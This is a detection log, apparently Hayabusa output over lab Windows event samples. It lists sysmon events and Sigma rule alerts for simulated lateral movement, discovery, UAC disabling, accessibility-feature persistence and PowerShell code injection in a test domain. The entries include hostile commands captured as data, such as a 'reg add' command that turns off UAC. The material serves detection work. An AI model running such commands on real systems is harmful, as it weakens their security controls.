2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx
2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx
2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
